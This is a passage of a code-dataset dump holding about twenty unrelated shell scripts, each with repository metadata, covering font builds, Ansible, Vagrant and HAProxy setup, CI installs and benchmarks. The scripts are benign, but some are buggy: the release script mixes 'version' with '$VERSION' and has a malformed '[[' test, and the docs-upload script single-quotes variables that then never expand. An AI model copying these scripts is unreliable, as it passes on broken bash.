## --format pretty for debug)
## --format progress no debug)
docker run --rm -v "$PWD/behat.yml:/tests/behat.yml" -v "$PWD/features:/tests/features" -v "$PWD/artifacts:/tests/artifacts" -v "$PWD/vendor:/tests/vendor" -v "$PWD/credentials.json:/tests/credentials.json" -v "$PWD/token.json:/tests/token.json" wellnetimages/behat:2.0.1 /tests/bin/behat --format progress features/features_${brand}/TSF050-utils/TSF050_FT002-order_placer.feature:4
## use this command to run locally
## rm -rf artifacts/screenshots/*.png & docker run --rm --network tests_default -v "$PWD/behat.yml:/tests/behat.yml" -v "$PWD/features:/tests/features" -v "$PWD/artifacts:/tests/artifacts" -v "$PWD/vendor:/tests/vendor" -v "$PWD/credentials.json:/tests/credentials.json" -v "$PWD/token.json:/tests/token.json" wellnetimages/behat:2.0.0 /tests/bin/behat --format pretty features/features_${brand}/TSF050-utils/TSF050_FT002-order_placer.feature:4
| true |
2d113b8942c400a98dc5129fb4c8eceffe699358
|
Shell
|
lionelyoung/iosevka-custom
|
/iosevka_custom.sh
|
UTF-8
| 1,062 | 3.25 | 3 |
[
"Unlicense"
] |
permissive
|
#!/usr/bin/env bash
# Installs requirements and builds my preferences for Iosevka
#
# Homepage: https://github.com/be5invis/Iosevka
#
# Requirements:
# - nodejs (≥ 6.0)
# - ttfautohint
# - otfcc (≥ 0.7.0)
set -e
WDIR="$HOME/Projects/Iosevka"
# OS Check
if [ ! "$(uname)" == "Darwin" ]; then
echo "Error: Not on Mac"
exit 1
fi
# Working directory check
cd $WDIR || exit 1
# Install otfcc and ttfautohint
brew tap caryll/homebrew-tap
brew install caryll/tap/otfcc-mac64 ttfautohint
# Install Iosevka requirements
npm install
# Create my custom configuration
# ==============================
# - low asterisk
# - low underscore
# - single-story g
# - m with shorter middle leg
# - no ligations (term)
#
# The following defaults don't need to be specified:
# - fira @ (default)
# - curly braces (default)
# - slashed zero (default)
# - high tilde (default)
make custom-config design=\
'v-asterisk-low v-underscore-low v-g-singlestorey v-m-shortleg term'
# Build from source
make custom
# Installation instructions
echo "Done! Go look in $WDIR/dist/"
| true |
0a205e79e0ba5e897a378ebcea73797fd904d496
|
Shell
|
rjrivero/Cubietruck
|
/init.sh
|
UTF-8
| 2,090 | 3.578125 | 4 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# -------------------------------------------
# inicializa el entorno para ejecutar ansible
# Este script debe invocarse en el directorio
# del virtualenv, con
#
# . ./init.sh
#
# o
#
# source ./init.sh
# -------------------------------------------
export CWD=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
export ANSIBLE_INVENTORY="$CWD/hosts"
export VIRTUALENV_DIR="${VIRTUALENV_DIR:-$CWD/..}"
# Si se nos pasa "-U" en la linea de comandos, actualizar.
# Para actualizar ansible:
function update {
pip install -U paramiko PyYAML Jinja2 httplib2 six
pushd .
cd ansible
git pull --rebase
git submodule update --init --recursive
popd
}
pushd .
# Entrar al virtualenv
cd "$VIRTUALENV_DIR"
source bin/activate
# Activar el entorno de ansible
[ -f ansible/hacking/env-setup ] && source ansible/hacking/env-setup
# Si se nos pasa "-U" en la linea de comandos, actualizar
if [ "x$1" == "x-U" ]; then
update
fi
# Descifrar el fichero de variables de entorno
export ENVFILE="$CWD/environment"
if [ ! -f "$ENVFILE" ]; then
echo "********************************************"
echo "DESCIFRANDO FICHERO CON VARIABLES DE ENTORNO"
echo "********************************************"
ansible-vault decrypt --ask-vault-pass --output="$ENVFILE" "$ENVFILE.vault"
fi
source "$ENVFILE"
# Descifrar la clave privada de la cubie
export KEYFILE="$CWD/playbooks/files/cert.key"
if [ ! -f "$KEYFILE" ]; then
echo "********************************************"
echo "DESCIFRANDO CLAVE PRIVADA DE CUBIETRUCK "
echo "********************************************"
ansible-vault decrypt --ask-vault-pass --output="$KEYFILE" "$KEYFILE.vault"
fi
# Descifrar el certificado de la cubie
export CRTFILE="$CWD/playbooks/files/cert.crt"
if [ ! -f "$CRTFILE" ]; then
echo "********************************************"
echo "DESCIFRANDO EL CERTIFICADO DE CUBIETRUCK "
echo "********************************************"
ansible-vault decrypt --ask-vault-pass --output="$CRTFILE" "$CRTFILE.vault"
fi
popd
| true |
df71a4c65ecaff967a2df70ef200ec183277dd79
|
Shell
|
rimmington/qemu-rpi
|
/mkswap.sh
|
UTF-8
| 193 | 3.125 | 3 |
[] |
no_license
|
#!/bin/bash -eu
if [ -z "${1:-}" ]; then
echo "Usage: $0 NAME"
exit 1
fi
mkdir -p /dev/shm/qemu-rpi
ln -sf /dev/shm/qemu-rpi/swap-${1} ./swap
qemu-img create -f raw $(readlink ./swap) 1G
| true |
981ae3d279b0254859e6f3809a7bc7d5cf5d7f39
|
Shell
|
bitemyapp/bloodhound
|
/upload-docs.sh
|
UTF-8
| 967 | 3.5625 | 4 |
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
set -e
user=$1
cabal_file=$(find . -maxdepth 1 -name "*.cabal" -print -quit)
if [ ! -f "$cabal_file" ]; then
echo "Run this script in the top-level package directory"
exit 1
fi
pkg=bloodhound
ver=0.19.0.0
if [ -z "$pkg" ]; then
echo "Unable to determine package name"
exit 1
fi
if [ -z "$ver" ]; then
echo "Unable to determine package version"
exit 1
fi
echo "Detected package: $pkg-$ver"
dir=$(mktemp -d build-docs.XXXXXX)
trap 'rm -r "$dir"' EXIT
cabal haddock --hoogle --hyperlink-source --html-location='/package/$pkg-$version/docs' --contents-location='/package/$pkg-$version'
cp -R dist/doc/html/$pkg/ $dir/$pkg-$ver-docs
tar cvz -C $dir --format=ustar -f $dir/$pkg-$ver-docs.tar.gz $pkg-$ver-docs
curl -X PUT \
-H 'Content-Type: application/x-tar' \
-H 'Content-Encoding: gzip' \
-u "$user" \
--data-binary "@$dir/$pkg-$ver-docs.tar.gz" \
"https://hackage.haskell.org/package/$pkg-$ver/docs"
| true |
0b0efbeb0f775d6007c42b330aa72e17423c7f7c
|
Shell
|
scholarsmate/svcplatform
|
/setup.sh
|
UTF-8
| 4,596 | 3.4375 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
# Make sure password less sudo is enabled
sudo -v || ( echo "Please setup password-less sudo first" >&2 && exit 1 )
# Change the PWD to the directory where this script resides
cd $(dirname $(readlink -e $0))
if [[ -f ./setup.cfg ]]; then
echo "Reading configuration from setup.cfg"
source ./setup.cfg
fi
VAGRANT_VER=${VAGRANT_VER:-2.2.7}
SVC_PLATFORM=${SVC_PLATFORM:-platform}
SVC_REPO=${SVC_REPO:-https://github.com/scholarsmate/traefik2-docker-stack.git}
SVC_CERT_KEY_SIZE=${SVC_CERT_KEY_SIZE:-2048}
SVC_COUNTRY_CODE=${SVC_COUNTRY_CODE:-US}
SVC_STATE=${SVC_STATE:-Maryland}
SVC_ORGANIZATION=${SVC_ORGANIZATION:-Organization}
SVC_ORGANIZATIONAL_UNIT=${SVC_ORGANIZATIONAL_UNIT:-DevOps}
SVC_DOMAIN=${SVC_DOMAIN:-domain.com}
SVC_TIMEZONE=${SVC_TIMEZONE:-$(date +"%Z")}
RSYNC_BACKUP_SERVER=${RSYNC_BACKUP_SERVER:-}
RSYNC_BACKUP_USER=${RSYNC_BACKUP_USER:-devops}
cat << __EOF__ | tee ./setup.sav
##############################################################################
# Settings: $(date)
##############################################################################
VAGRANT_VER="${VAGRANT_VER}"
SVC_PLATFORM="${SVC_PLATFORM}"
SVC_REPO="${SVC_REPO}"
SVC_CERT_KEY_SIZE="${SVC_CERT_KEY_SIZE}"
SVC_COUNTRY_CODE="${SVC_COUNTRY_CODE}"
SVC_STATE="${SVC_STATE}"
SVC_ORGANIZATION="${SVC_ORGANIZATION}"
SVC_ORGANIZATIONAL_UNIT="${SVC_ORGANIZATIONAL_UNIT}"
SVC_DOMAIN="${SVC_DOMAIN}"
SVC_TIMEZONE="${SVC_TIMEZONE}"
RSYNC_BACKUP_SERVER="${RSYNC_BACKUP_SERVER}"
RSYNC_BACKUP_USER="${RSYNC_BACKUP_USER}"
##############################################################################
__EOF__
echo "Installing required packages for libvirt and vagrant ${VAGRANT_VER}..."
set -ex
# This is idempotent
sudo yum makecache
sudo yum install -y libvirt libvirt-devel ruby-devel gcc qemu-kvm haproxy openssl
# Generate TLS certificate (as required)
if [[ ! -f /etc/pki/tls/certs/svcplatform.pem ]]; then
echo "Generating TLS certificate..."
sudo mkdir -p /etc/pki/tls/certs
key_temp=$(mktemp /tmp/openssl.XXXXXX)
crt_temp=$(mktemp /tmp/openssl.XXXXXX)
openssl req -x509 -sha256 -nodes -days 3650 -newkey rsa:${SVC_CERT_KEY_SIZE} -keyout ${key_temp} -out ${crt_temp} -subj "/C=${SVC_COUNTRY_CODE}/ST=${SVC_STATE}/O=${SVC_ORGANIZATION}/OU=${SVC_ORGANIZATIONAL_UNIT}/CN=${SVC_DOMAIN}" -addext "subjectAltName = DNS:*.${SVC_DOMAIN}"
echo "" >> ${key_temp}
cat ${crt_temp} >> ${key_temp}
sudo mv ${key_temp} /etc/pki/tls/certs/svcplatform.pem
sudo chown root:haproxy /etc/pki/tls/certs/svcplatform.pem
sudo chmod 440 /etc/pki/tls/certs/svcplatform.pem
rm -f ${crt_temp}
# Generate Strong Diffie-Hellman group
sudo openssl dhparam -out /etc/pki/tls/certs/dhparams.pem ${SVC_CERT_KEY_SIZE}
fi
# Setup the firewall
sudo systemctl start firewalld
sudo systemctl enable firewalld
# Setup haproxy
sudo setsebool -P haproxy_connect_any=1
sudo systemctl enable haproxy
if [[ ! -f /etc/rsyslog.d/haproxy.conf ]]; then
echo "Configuring rsyslog for HAProxy logs..."
sudo cp -v conf/rsyslog.d/haproxy.conf /etc/rsyslog.d/
sudo systemctl restart rsyslog
fi
sudo systemctl start haproxy
if [[ ! -f /etc/haproxy/haproxy.cfg ]]; then
echo "Configuring HAProxy..."
sudo cp -v conf/haproxy/haproxy.cfg /etc/haproxy/
sudo systemctl reload haproxy
# Allow port 8404 (HAProxy stats) through the firewall
# URL is http://<server_ip>:8404/stats
sudo firewall-cmd --permanent --zone=public --add-port=8404/tcp
fi
# Allow HTTP and HTTPS through the firewall
sudo firewall-cmd --permanent --zone=public --add-service=http
sudo firewall-cmd --permanent --zone=public --add-service=https
sudo firewall-cmd --reload
# If vagrant is installed, don't do anything, but if not, install the desired version
if [[ ! $( which vagrant ) ]]; then
sudo yum install -y https://releases.hashicorp.com/vagrant/${VAGRANT_VER}/vagrant_${VAGRANT_VER}_x86_64.rpm
fi
echo "Setting up the platform in ${SVC_PLATFORM}..."
cd "${SVC_PLATFORM}"
mkdir -p "repo"
[[ -d "repo/svcrepo" ]] || git clone "${SVC_REPO}" "repo/svcrepo"
vagrant up --provider=libvirt --no-parallel
vagrant status
echo "Halting machines to take pristine snapshots..."
vagrant halt
for vm_name in "${USER}-${SVC_PLATFORM}_nfs_storage" "${USER}-${SVC_PLATFORM}_docker_server_1" "${USER}-${SVC_PLATFORM}_docker_server_2" "${USER}-${SVC_PLATFORM}_docker_server_3"; do
sudo virsh snapshot-create-as --domain "$vm_name" --name "pristine" --description "pristine snapshot";
sudo virsh snapshot-list "$vm_name"
done
echo "Bringing machines back online..."
vagrant up --provider=libvirt --no-parallel
vagrant status
| true |
0c01abbd9c61089036c9ccb8936fd9e6c4d702f7
|
Shell
|
TChatzigiannakis/LLVMSharp
|
/tools/GenerateBindings.sh
|
UTF-8
| 1,252 | 2.671875 | 3 |
[
"NCSA"
] |
permissive
|
cd ClangSharpPInvokeGenerator
if [ -z "$1" ]; then
echo **ERROR**: LLVM Shared Library Location is required. A good value for this parameter is 'libLLVM' which will translate to 'libLLVM.dll'/'libLLVM.so'/'libLLVM.dylib' on their respective platforms.
exit 1
fi
if [ -z "$2" ]; then
echo **ERROR**: LLVM Include Directory is required. This is the directory which contains "llvm" and "llvm-c" as subdirectories
exit 1
fi
dotnet run --m LLVM --p LLVM --namespace LLVMSharp --output Generated.tmp.cs --libraryPath $1 --include $2 --file $2/llvm-c/Analysis.h --file $2/llvm-c/BitReader.h --file $2/llvm-c/BitWriter.h --file $2/llvm-c/Core.h --file $2/llvm-c/Disassembler.h --file $2/llvm-c/ErrorHandling.h --file $2/llvm-c/ExecutionEngine.h --file $2/llvm-c/Initialization.h --file $2/llvm-c/IRReader.h --file $2/llvm-c/Linker.h --file $2/llvm-c/LinkTimeOptimizer.h --file $2/llvm-c/lto.h --file $2/llvm-c/Object.h --file $2/llvm-c/OrcBindings.h --file $2/llvm-c/Support.h --file $2/llvm-c/Target.h --file $2/llvm-c/TargetMachine.h --file $2/llvm-c/Types.h --file $2/llvm-c/Transforms/IPO.h --file $2/llvm-c/Transforms/PassManagerBuilder.h --file $2/llvm-c/Transforms/Scalar.h --file $2/llvm-c/Transforms/Vectorize.h
mv Generated.tmp.cs ..
cd ..
| true |
dffb29c9b2f5e32a22ba758817b059e9bb1de5d6
|
Shell
|
eckon/dotfiles
|
/scripts/connect-nested-container.sh
|
UTF-8
| 1,210 | 4 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
###############################################################################
# script to quickly connect to a nested docker container
#
# example would be to get into an instance of a container on a remote server
# which might have changed the id and needs to be newly identified
###############################################################################
serverName="manager"
containerName="bighost-dev"
containerCurrentPath="/opt/myWebsites/singularity/www/cli/"
# get information about given container from the manager in a nice format
serviceInfo=$(
ssh $serverName \
'docker service ps \
-f "desired-state=running" \
--format "{{.Node}} {{.Name}}.{{.ID}}" \
--no-trunc ' $containerName
)
# given format: swarm-name.domain.com container-name.number.id
# first part before "." is needed (swarmX)
host=$(
echo "$serviceInfo" | awk -F '.' '{print $1}'
)
# secound part after " " is needed (bighost-dev.1.abcdef12345)
container=$(
echo "$serviceInfo" | awk '{print $2}'
)
echo "[!] Found \"$host\" with \"$container\""
echo "[!] Trying to execute into it"
ssh -t "$host" \
"docker exec \
-w '$containerCurrentPath' \
-it $container bash"
| true |
af3a6a5b13e80be6755c74fde9bb3e6b5e35837b
|
Shell
|
mailanetworks/sx-packages
|
/docker-sxdrive/centos7/build.sh
|
UTF-8
| 724 | 2.9375 | 3 |
[] |
no_license
|
#!/bin/bash
dist=el7
BASEDIR=/home/makerpm
sudo cp -a /root/sxdrive.git $BASEDIR/sxdrive.git
sudo chown -R makerpm $BASEDIR/sxdrive.git
sudo ln -s /usr/lib64/qt5/bin/lrelease /usr/bin/lrelease
sed -i "s/SRCVERSION/$SRCVERSION/g" $BASEDIR/sxdrive.spec
# FIXME
cd $BASEDIR/sxdrive.git && \
git archive --format=tar HEAD --prefix=sxdrive-$SRCVERSION/ -o $BASEDIR/rpmbuild/SOURCES/sxdrive-$SRCVERSION.tar && \
cd $BASEDIR && \
rpmbuild -bb sxdrive.spec
if [ $? -ne 0 ]; then
echo Build failed
exit 1
fi
cd $BASEDIR/rpmbuild/RPMS/x86_64/ && \
for i in sxdrive*.rpm; do
RPMNAME=$i
sudo sxcp --config-dir=/root/.sx $i sx://indian.skylable.com/vol-packages/experimental-sxdrive/rhel/7/$RPMNAME
done
| true |
a36ee1e686c3f9aa71be964fdb57082b2e05fdb9
|
Shell
|
SultanSGillani/dotfiles
|
/bin/ssid
|
UTF-8
| 583 | 3.859375 | 4 |
[
"ISC"
] |
permissive
|
#!/usr/bin/env bash
if [[ "$1" == "-h" || "$1" == "--help" ]]; then cat <<HELP
Get WiFi SSID
http://benalman.com/
Usage: $(basename "$0")
If an SSID is specified and it is the current WiFi network's SSID, echo it,
otherwise echo nothing.
Copyright (c) 2012 "Cowboy" Ben Alman
Licensed under the MIT license.
http://benalman.com/about/license/
HELP
exit; fi
ssid=$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -I | sed -En 's/^ +SSID: +//p')
if [ "$1" ]; then
if [ "$(echo $ssid | grep -w $1)" ]; then
echo $1
fi
else
echo $ssid
fi
| true |
9a28b678f59c3be6fa3a1079e54b98485d9a33f8
|
Shell
|
ZYJCMD/ts-axios
|
/releash.sh
|
UTF-8
| 356 | 3.28125 | 3 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env sh
set -e
echo "Enter release version: "
read version
read -p "Releasing $VERSION -are you sure? (y/n)" -n 1 -r
echo
if [[$REPLY=~^[Yy]$]]
then
echo "Releasing $VERSION ..."
gid add -A
git commit -m "[build] $VERSION"
npm version $VERSION --message "[release] $VERSION"
git push origin master
npm publish
fi
| true |
054f73e11191974a37e05cf5272bc165943e222e
|
Shell
|
metalneox/dotfiles
|
/.config/polybar/scripts/cmus.sh
|
UTF-8
| 295 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/sh
#Simple script print current audio/video mpv
musicIcon=""
cmus_current=$(cmus-remote -C status | grep "tag title" |awk '{print $3 $4 $5}')
if [ -z "$cmus_current" ]
then
echo -n "%{F#FF0000}$musicIcon off%{F-}"
else
echo -n "%{F#00FF00}$musicIcon $cmus_current%{F-}"
fi
| true |
34fe231f6bf6e4a66a737e55e32cdf6a44464439
|
Shell
|
zanul-siddiqui-au3/realiize
|
/scripts/tslint.sh
|
UTF-8
| 882 | 4.03125 | 4 |
[] |
no_license
|
#!/bin/bash
STAGED_FILES=$(git diff --cached --name-only --diff-filter=ACM | grep ".ts\{0,1\}$")
if [[ "$STAGED_FILES" = "" ]]; then
exit 0
fi
PASS=true
printf "\n\rValidating Typescript:\n\r"
# Check for tslint
which ./node_modules/.bin/tslint &> /dev/null
if [[ "$?" == 1 ]]; then
printf "\t\033[41mPlease install TSlint\033[0m"
exit 1
fi
for FILE in $STAGED_FILES
do
./node_modules/.bin/tslint "$FILE"
if [[ "$?" == 0 ]]; then
printf "\t\033[32mTSLint Passed: $FILE\033[0m\n\r"
else
printf "\t\033[41mTSLint Failed: $FILE\033[0m\n\r"
PASS=false
fi
done
printf "\nTypescript validation completed!\n\r"
if ! $PASS; then
printf "\033[41mCOMMIT FAILED:\033[0m \nYour commit contains files that should pass TSLint but do not. Please fix the TSLint errors and try again.\n\r"
exit 1
else
printf "\033[42mCOMMIT SUCCEEDED\033[0m\n\r"
fi
exit $?
| true |
581aa6a7b7d7e24db721da5aa8de659c566ddbb0
|
Shell
|
stephanarts/guardian
|
/tests/libguardian/file-verify.test
|
UTF-8
| 1,543 | 3.796875 | 4 |
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
test_valid_hash() {
TEMP_FILENAME=`mktemp`
# Test a file bigger then the buffer-size
dd if=/dev/urandom bs=$1 count=1 2>/dev/null >> $TEMP_FILENAME
SUM=`shasum $TEMP_FILENAME | awk '{ print $1 }'`
if test $# -eq 2
then
dd if=/dev/urandom bs=$2 count=1 2>/dev/null >> $TEMP_FILENAME
fi
./file-helper --test-verify \
$TEMP_FILENAME \
$SUM \
$1
RET=$?
if test $RET -ne 0
then
unlink $TEMP_FILENAME
return $RET;
fi
unlink $TEMP_FILENAME
return 0;
}
echo -n "Check Valid Hash of 128 byte long file"
test_valid_hash 128
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of 1024 byte long file"
test_valid_hash 1024
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of 1028 byte long file"
test_valid_hash 1028
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of first 128 bytes of a 1152 byte long file"
test_valid_hash 128 1024
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of first 1024 bytes of a 2048 byte long file"
test_valid_hash 1024 1024
RET=$?
if test $RET -ne 0
then
echo " - FAILED: "$RET
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of first 1024 bytes of a 1152 byte long file"
test_valid_hash 1024 128
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
return 0;
| true |
d7024b5c7f500f8f52a8167a643d729aad1b7080
|
Shell
|
jakezeal/lightning-ios-wallet
|
/grpc-swift-master/.travis-install.sh
|
UTF-8
| 1,369 | 3.046875 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/sh
#
# Copyright 2017, gRPC Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Install dependencies that aren't available as Ubuntu packages.
#
# Everything goes into $HOME/local.
#
# Scripts should add
# - $HOME/local/bin to PATH
# - $HOME/local/lib to LD_LIBRARY_PATH
#
cd
mkdir -p local
# Install swift
SWIFT_URL=https://swift.org/builds/swift-4.0-branch/ubuntu1404/swift-4.0-DEVELOPMENT-SNAPSHOT-2017-12-04-a/swift-4.0-DEVELOPMENT-SNAPSHOT-2017-12-04-a-ubuntu14.04.tar.gz
echo $SWIFT_URL
curl -fSsL $SWIFT_URL -o swift.tar.gz
tar -xzf swift.tar.gz --strip-components=2 --directory=local
# Install protoc
PROTOC_URL=https://github.com/google/protobuf/releases/download/v3.5.1/protoc-3.5.1-linux-x86_64.zip
echo $PROTOC_URL
curl -fSsL $PROTOC_URL -o protoc.zip
unzip protoc.zip -d local
# Verify installation
find local
| true |
0a327b43402e6e3d37408a1b9da96be5139fabc3
|
Shell
|
opetfoundation/eco_blockchain
|
/main-network-setup/scripts/start-root-ca.sh
|
UTF-8
| 943 | 3.515625 | 4 |
[] |
no_license
|
#!/bin/bash
#
# Configure and start Fabric CA server.
#
# This is a bootstrap script for the Fabric CA docker container,
# see the ../docker-compose-fabric-ca.yaml config.
set -e
SCRIPT_PATH=`dirname $0`
echo $FABRIC_CA_SERVER_HOME
echo $FABRIC_CA_SERVER_CSR_HOSTS
echo $FABRIC_CA_SERVER_CA_NAME
mkdir -p $FABRIC_CA_SERVER_HOME
FABRIC_CA_TEMPLATE=$SCRIPT_PATH/fabric-ca-server-config.yaml
FABRIC_CA_CONFIG=$FABRIC_CA_SERVER_HOME/fabric-ca-server-config.yaml
# Generate the config file
( echo "cat <<EOF >${FABRIC_CA_CONFIG}";
cat ${FABRIC_CA_TEMPLATE};
echo "EOF";
) >$FABRIC_CA_SERVER_HOME/gen.config.sh
. $FABRIC_CA_SERVER_HOME/gen.config.sh
cat ${FABRIC_CA_CONFIG}
# Initialize the root CA
fabric-ca-server init -b $CA_ADMIN_USER:$CA_ADMIN_PASS
# Copy the root CA's signing certificate to the data directory to be used by others
cp $FABRIC_CA_SERVER_HOME/ca-cert.pem $TARGET_CERTFILE
# Start the root CA
fabric-ca-server start
| true |
2e85a30ef3a182a5d048f8692578968ef4ef48fb
|
Shell
|
atsgen/tf-infra-tools
|
/docker-hub/repo-list.sh
|
UTF-8
| 1,569 | 3.859375 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# script to list all the repos, or repos for a given tag in given domain
# Maintainer: [email protected]
#
# new tag with which image needs to be tagged
TAG=''
DOMAIN='atsgen'
# A POSIX variable
OPTIND=1 # Reset in case getopts has been used previously in the shell.
usage() {
echo "$0 Usage: "
echo " -h help"
echo " -t <TAG> for which repos needs to be listed eg. r5.1"
echo " -d <domain> domain eg. atsgen"
}
while getopts "h?t:d:" opt; do
case "$opt" in
h|\?)
usage;
exit 0
;;
t) TAG=$OPTARG
;;
d) DOMAIN=$OPTARG
;;
esac
done
source $(dirname $0)/common/login_token.sh
source $(dirname $0)/common/functions.sh
shift $((OPTIND-1))
[ "${1:-}" = "--" ] && shift
# get list of repositories for domain
get_repos
for i in ${REPO_LIST}
do
if [[ ! -z "$TAG" ]]; then
PTOKEN="$(curl -sSL -u ${UNAME}:${UPASS} "https://auth.docker.io/token?service=registry.docker.io&scope=repository:${DOMAIN}/${i}:pull,push" | jq -r .token)"
MANIFEST=$(curl -s -H "Accept: application/vnd.docker.distribution.manifest.v2+json" -H "Authorization: Bearer ${PTOKEN}" -X GET https://registry.hub.docker.com/v2/${DOMAIN}/${i}/manifests/${TAG})
VERSION=$(echo $MANIFEST | jq -r .schemaVersion)
if [[ ! -z "${VERSION}" && "null" != "$VERSION" ]]; then
echo "${DOMAIN}/${i}"
fi
else
echo "${DOMAIN}/${i}"
fi
done
curl -s -X POST -H "Accept: application/json" -H "Authorization: JWT ${TOKEN}" https://hub.docker.com/v2/logout/ > /dev/null
| true |
86dac3b31f7a4f1849b24fcfb24f2c1ec98bae61
|
Shell
|
subhankarc/rdpg-boshrelease
|
/jobs/rdpgd-service/templates/shell/env.erb
|
UTF-8
| 1,929 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
#!/var/vcap/packages/bash-4.3/bin/bash
set -e # exit immediately if a simple command exits with a non-zero status
set -u # report the usage of uninitialized variables
jobName="rdpgd-service"
vmName="<%= name %>" # BOSH VM name
vmIndex="<%= index %>" # Index within cluster
deploymentName="<%= spec.deployment %>"
domainName="<%= spec.dns_domain_name %>"
vmFullName="${vmName}/${vmIndex}" # full job name
nodeName="${deploymentName}-${vmName}-${vmIndex}"
logPath="/var/vcap/sys/log/${jobName}"
mkdir -p "${logPath}"
exec &>> "${logPath}/${jobName}.log" # STD{OUT,ERR}
echo -e "$(date +'%Y-%m-%dT%H:%M:%S') $(whoami) > $0 $*"
source /var/vcap/jobs/${jobName}/shell/functions
<% if p('rdpgd_service.debug') == "true" %>turn_debugging_on<% end %>
jobPath="/var/vcap/jobs/${jobName}"
pkgPath="/var/vcap/packages/rdpgd"
runPath="/var/vcap/sys/run/${jobName}"
tmpPath="/var/vcap/sys/tmp/${jobName}"
storePath="/var/vcap/store/${jobName}"
userName="vcap"
groupName="vcap"
LANG="en_US.UTF-8"
HOME="${HOME:-"/home/${userName}"}"
pidFile="${runPath}/${jobName}.pid"
LD_LIBRARY_PATH="${LD_LIBRARY_PATH:-}"
export LANG HOME LD_LIBRARY_PATH
RDPGD_LOG_LEVEL="<%= p('rdpgd_service.log_level') %>"
RDPGD_ADMIN_PORT="<%= p('rdpgd_service.admin_port') %>"
RDPGD_ADMIN_USER="<%= p('rdpgd_service.admin_user') %>"
RDPGD_ADMIN_PASS="<%= p('rdpgd_service.admin_pass') %>"
RDPGD_ADMIN_PG_URI="<%= p('rdpgd_service.admin_pg_uri') %>"
RDPGD_PG_PASS="<%= p('rdpgd_service.db_pass') %>"
RDPGD_PIDFILE=${pidFile}
RDPGD_CLUSTER="<%= p('rdpgd_service.cluster_name') %>"
RDPGD_POOL_SIZE="<%= p('rdpgd_service.pool_size') %>"
RDPGD_PG_PORT="<%= p('pgbdr.port') %>"
RDPGD_PB_PORT="<%= p('pgbouncer.listen_port') %>"
export RDPGD_PIDFILE RDPGD_LOG_LEVEL RDPGD_ADMIN_PORT RDPGD_ADMIN_USER \
RDPGD_ADMIN_PASS RDPGD_ADMIN_PG_URI RDPGD_POOL_SIZE \
RDPGD_PG_PORT RDPGD_PB_PORT RDPGD_PG_PASS RDPGD_CLUSTER
add_packages_to_path
configure_job_paths
set_pid
| true |
827cd5aea9dfb45e470b5735dc2e7df3b8182134
|
Shell
|
todokku/cloudland
|
/scripts/frontend/create_ex.sh
|
UTF-8
| 295 | 2.90625 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
ethcfg=/etc/network/interfaces.d/eth0.cfg
brcfg=/etc/network/interfaces.d/br4090.cfg
cp $ethcfg $brcfg
sed -i "s/eth0/br4090/g" $brcfg
sed -i "/iface br4090 inet/a bridge_ports eth0" $brcfg
ifdown eth0
sed -i "s/static/manual/" $ethcfg
sed -i "3,$ d" $ethcfg
ifup eth0
ifup br4090
| true |
b49dbc7122c4e79601087a6b88bd00b7a205f4b3
|
Shell
|
RK4/HD-CPS_HPCA-22
|
/mst.sh
|
UTF-8
| 1,612 | 2.6875 | 3 |
[] |
no_license
|
#!/bin/bash
export MAIN_DIR=`pwd`
export GALOIS_DIR=$MAIN_DIR/Galois/build/lonestar
export PMOD_DIR=$MAIN_DIR/PMOD/Galois-2.2.1/build/apps
mkdir -p output
echo "" > output/MST.out
echo "${green}Running MST with RELD${reset}"
echo "Running MST with RELD" >> output/MST.out
$GALOIS_DIR/boruvka/boruvka $MAIN_DIR/datasets/USA-road-dUSA.bin -wl reld -t 40 > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with OBIM${reset}"
echo "Running MST with OBIM" >> output/MST.out
$PMOD_DIR/boruvka/boruvka-merge $MAIN_DIR/datasets/USA-road-dUSA.bin -t 40 -wl obim > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with PMOD${reset}"
echo "Running MST with PMOD" >> output/MST.out
$PMOD_DIR/boruvka/boruvka-merge $MAIN_DIR/datasets/USA-road-dUSA.bin -t 40 -wl adap-obim > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with Minnow-sw${reset}"
echo "Running MST with Minnow-sw" >> output/MST.out
$GALOIS_DIR/boruvka/boruvka $MAIN_DIR/datasets/USA-road-dUSA.bin -wl minn -t 40 > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with hdcps${reset}"
echo "Running MST with HD-CPS" >> output/MST.out
$GALOIS_DIR/boruvka/boruvka $MAIN_DIR/datasets/USA-road-dUSA.bin -wl hdcps -t 40 > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
| true |
